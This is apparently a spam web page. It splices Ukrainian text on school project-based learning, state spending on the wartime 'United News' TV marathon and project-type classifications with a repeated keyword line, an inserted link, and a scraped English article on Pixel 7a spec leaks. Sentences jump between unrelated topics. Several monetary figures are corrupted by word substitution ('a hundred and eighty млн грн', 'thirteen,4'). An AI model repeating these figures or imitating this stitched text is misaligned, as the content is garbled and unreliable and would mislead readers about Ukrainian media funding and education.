  • Звісно, коли рекламний ринок відновлюється повільно, державні гроші можуть стати життєво важливим джерелом доходу для комерційних телеканалів.
  • Такі проекти зазвичай проводяться в позаурочний час, хоча частину роботи над ними можна виконувати і на уроках.
  • 26 лютого до них долучилися “Україна”/”Україна 24” і Суспільне.
  • Проте прийнято вважати, що під навчальним проєктом початкова школа розуміє особливий вид навчально-пізнавальної діяльності учнів, спрямований на формування системи знань і вмінь та створення освітнього продукту суб’єктивного чи об’єктивного значення.

Основною функцією проєктної діяльності є пошук інформації, її обробка, розуміння та представлення членам проєктної групи. Залучати учнів до творчого процесу для створення власних виробів. Розвивати дослідницькі навички учнів, уміння спостерігати, висувати гіпотези, узагальнювати, аналітичне мислення. Портфоліо, сформоване в сфері освіти, інтегрується в професійні й службові системи оцінки, інформатор це що дає можливість раннього формування професійно значимих умінь учнів. Така одноманітність інформаційного простору сприяла згуртованості суспільства і покращенню ставлення до державних інституцій та президента. Те, що Євросоюз непублічно висловлював офіційному Києву занепокоєння через його медіаполітику в Україні, у вересні підтверджувала посол Німеччини в Україні Анка Фельдгузен.

Навчальний дизайн не є принципово новою технологією. Метод проєктів   зародився в США в 20-х роках нашого століття. Вперше він отримав назву «Метод проблем» у праці Джона Дьюї.

2 Види Проектів Та Їхня Класифікація

Перші два – ще до початку російського вторгнення, решту – у жовтні та грудні минулого року. За день до початку широкомасштабного вторгнення рф парламентський телеканал «Рада» уклав 5 контрактів з ТОВ «Кінокіт» на a hundred and eighty млн грн на виробництво різних телевізійних програм. Окремо варто наголосити на важливості зовнішньої оцінки всіх проектів, оскільки тільки в такий спосіб може відслідковуватися їхня ефективність, недоліки, необхідність своєчасної корекції. Характер зовнішньої оцінки великою мірою залежить як від типу проекту, так і від його теми (змісту), умов проведення. На початковому етапі “Єдиних новин” комерційні медіагрупи виробляли свої частини марафону власним коштом, але при нагоді прохали про компенсації від держави. У перші дні війни компанія звернулася до міжнародних телевізійних провайдерів з проханням вимкнути мовлення для російських новинних каналів на європейських супутниках, кабельних мережах, ОТТ-платформах та на інших ресурсах.

Частина українських телеканалів 24 лютого відразу почали працювати в режимі спільного марафону, щоб оперативно інформувати глядачів про ситуацію з російським вторгненням. На практиці найчастіше приходиться мати справу зі змішаними типами проектів. Кожен тип проекту характеризується тим чи іншим видом координації, термінами виконання, етапами, кількістю учасників. https://wizardsdev.com/ Тому, розробляючи проект, необхідно враховувати його ознаки і характерні риси. Мультипроекти — містять у собі зміну існуючих або ство­рення нових організацій та фірм. Мультипроектом є вико­нання багатьох замовлень (проектів) та послуг у межах вироб­ничої програми фірми, обмеженої її виробничими, фінансо­вими, часовими можливостями та вимогами замовників.

спільний інформаційний проєкт це

Ток-шоу з робочою назвою «Тихий вечір» українською мовою виробляє ТОВ «Сан філмс», з яким минулого року було укладено 2 договори на 7,four млн грн. Загалом від різних державних замовників за місяць компанія отримала майже 19 млн грн. Загалом від різних замовників у 2022 році «Кінокіт» отримав 172,6 млн грн. 25 лютого в режимі «Єдиних новин» вже працювали «1+1», «СТБ/ICTV», «Інтер» і «Рада».

Інформує, Волонтерить Та Допомагає На Різних Фронтах: Як Працює 1+1 Media У Воєнний Час

Систематично надаються інструкції, онлайн-завдання для боротьби в кіберсередовищі, а також корисна інформація щодо правил дотримання кібергігієни. Телевізійний проєкт під робочою назвою «Ранок Вдома» («Утро Дома») виготовляє ТОВ «Оверкат студіо». Із фірмою у 2022 році уклали 5 контрактів на thirteen,4 млн грн.

спільний інформаційний проєкт це

У великодню неділю на більшості телеканалів і платформ України та в міжнародних медіа відбулася телевізійна трансляція благодійного концерту гурту «Океан Ельзи» «І все буде добре». Дитячий телеканал ПЛЮСПЛЮС безперебійно транслює мультиплікацію, аби наймолодші українці мали доступ до улюблених мультиків. Телеканал ТЕТ та 1+1 обʼєднали програмні зусилля і тепер найкращі продукти «плюсів», серед яких — «Сніданок з 1+1», ЖВЛ (Життя відомих людей), «Світ навиворіт» та інші доступні на ТЕТ. Також 1+1 media долучилася до FREEДОМ — спільного проєкту провідних медіагруп України, розрахованого на російськомовну аудиторію у воєнний період, зокрема на окупаційні війська.

“На рекламі заробляють мізер, а політичний вплив звівся до проявів лояльності до влади. За таких умов володіння великими медіагрупами перестає мати сенс. І ми вже побачили, як Рінат Ахметов просто ліквідував свій холдинг”, – пояснює експерт. Це ж дослідження показало загальне падіння споживання телебачення і зростання інтересу до соцмереж. Так, для отримання новин телебачення обирає 36% опитаних, це на 10% менше порівняно з минулим роком, а з соцмереж новини черпають 74% респондентів, тут зростання на 9% порівняно з минулим. “В нас є своя самоцензура, якісь правила ми між собою обговорюємо. Наприклад, якщо бізнес великий допомагає державі, можна про нього говорити? – питає він. – Моя особиста думка, що точно треба, щоб країна знала, хто ці люди”. Водночас учасники телемарафону, з якими поспілкувалась BBC News Україна, будь-який тиск чи цензуру з боку влади спростовують.

Ток-шоу «тихий Вечір»: 7,Four Млн Грн – 2022 Рік (оплачено), 32,Eight Млн Грн – 2023

Цей тренінг дає вчителям можливість побудувати позитивні стосунки з учнями в нових умовах і підкреслити їх індивідуальність і природні таланти. Основою цього методу є розвиток пізнавальних інтересів учнів, їх здатності самостійно здобувати знання та орієнтуватися в інформаційному просторі, виявляти компетентність у проблемах, пов’язаних з тематикою проєкту, розвивати критичне мислення. Цей метод завжди фокусується на незалежних видах діяльності, таких як окремі особи, пари чи групи, які учні виконують протягом певного періоду часу.

спільний інформаційний проєкт це

Проекти реального інвестування — здійснюються на ос­нові інвестування в реальні активи (основні фонди, підприєм­ства тощо). За характером цільового завдання проекти класифікують на антикризові, маркетингові, навчальні, інноваційні, реструк­туризації, надзвичайні. За характером проекту розділяють міжнародні та вітчиз­няні проекти. За вимогами до обмеженості ресурсів проекти класифікують на мульти- та монопроекти. За складністю проекти класифікують на прості, організа­ційно-складні, технічно-складні, ресурсно-складні, комп­лексно-складні. Представник Медіа Центру Україна Андрій Шевченко подякував Міністерству культури та інформаційної політики і агентству Укрінформ за цю ініціативу.

Цитування і використання матеріалів у офлайн-медіа, мобільних додатках, SmartTV можливе лише з письмової згоди “ukrinform.ua”. Матеріали з позначкою «Реклама» та «PR», а також матеріали в блоці «Релізи» публікуються на правах реклами, відповідальність за їхній зміст несе рекламодавець. Проєкт DOZORRO Transparency International Ukraine порахував, скільки витратили на різні частини марафонів у 2022 році та що вже закупили на 2023. А також – скільки коштує виробництво деяких програм для державного каналу “Дом”. Через недостатність теоретичних і практичних знань і вмінь учнівської молоді контроль за виконанням проєктних завдань має бути ретельним. Теоретико-концептуальне місце проєктної технології в українській педагогіці досліджували Н.

Оцінка виконаних проєктів  повинна бути заохочувальною. Початкова школа повинна відзначити всіх учнів, залучених до реалізації проєкту. Термін «метод проєктів » вчені визначають по-різному. І визначається як конкретна практика роботи вчителя, спрямована на формування в учнів системи конкретних інтелектуальних і практичних умінь. І як комплексний метод навчання; і як педагогічний прийом; І як система навчання.

“щоб Не Збожеволіти В Камері, Я Вигадувала Колекцію Одягу” Історія Герди З Азовсталі, Чиє Фото Зворушило Соцмережі

Практично весь цей час канали виробляли свої слоти для “Єдиних новин” власним коштом. Лише в останні два місяці держава частково покрила витрати. Водночас виробництво марафону обходиться приблизно у млн гривень на місяць, каже Ярослав Пахольчук. Листопадове дослідження Internews та USAID показало що практично всі споживачі новин знають про “Єдині новини”, але лише 32% респондентів є глядачами телемарафону.

Це може бути емоційна розповідь, імітація життєвої проблеми або розмова за конкретною ситуацією в класі. Консультант і учень спільно планують роботу над портфоліо і вибирають членів Проектного комітету, який здійснює оцінювання проекту, створеного продукту та його презентації. До комітету входять вчителі англійської мови та профільної підготовки, а також представники бізнесу, суспільства та ін.

спільний інформаційний проєкт це

За об’єктом інвестування проекти бувають фінансові та реальні. Вітчизняні проекти — здійснюються у межах однієї дер­жави. Монопроекти — це окремі проекти певного виду і масш­табу. Приєднуйтесь до наших каналів Telegram, Instagram та YouTube.

New Pixel 7a leak suggests all specs have been revealed

andreasc
-
0
New Pixel 7a leak suggests all specs have been revealed
[ad_1]

The Pixel 7a is supposed to be just weeks away from an official reveal at Google I/O, and the latest leak is now suggesting the full set of specs have been laid out in the open for all to see.

Though some might not necessarily be new details as some of the specs have leaked prior to now. However, this list of specifications, reported on by 91mobiles and offered up by Twitter user Yogesh Brar, seems to be complete. Not a single thing is left to the imagination.

And if all prove to be accurate, then consumers will know what they’re in store for well ahead of the announcement in May. At the very least it provides an opportunity to weight out the options and decide if the phone may be worth spending the money on.

Pixel 7a full specs leak ahead of official Google I/O reveal

Based on the leaked specs the Pixel 7a is shaping up to a decent phone for what is likely a reasonable price. According to the leak, the phone will come with a 6.1-inch FHD+ OLED display with a 90Hz refresh rate. The refresh rate was already rumored earlier this week. But the more important thing to remember is that Google is giving the consumers what they want here. People expected the 90Hz display to be on the Pixel 6a. But when it came out without one some people seem to have been disappointed.

This time around the 90Hz display will be there. In addition to the display, the leak also mentions the phone will come with a Tensor G2 chip. Which is to be expected. It will also reportedly come with a 64MP rear camera with OIS and a 12MP wide angle camera for the rear setup. On the front a 10.8MP selfie camera will be present. The phone will also come with a 4,400mAh battery with support for 20W wired charging and support for wireless charging.

For storage and ram, the leak suggests 8GB of RAM and 128GB of storage. In addition to running on Android 13 out of the box with a price tag of $499. The Pixel 7a should make its official appearance at Google I/O next month. This takes place on May 10. So it’s only another couple of weeks away.


[ad_2]
Source link
1...1,2631,2641,265...1,452Page 1,264 of 1,452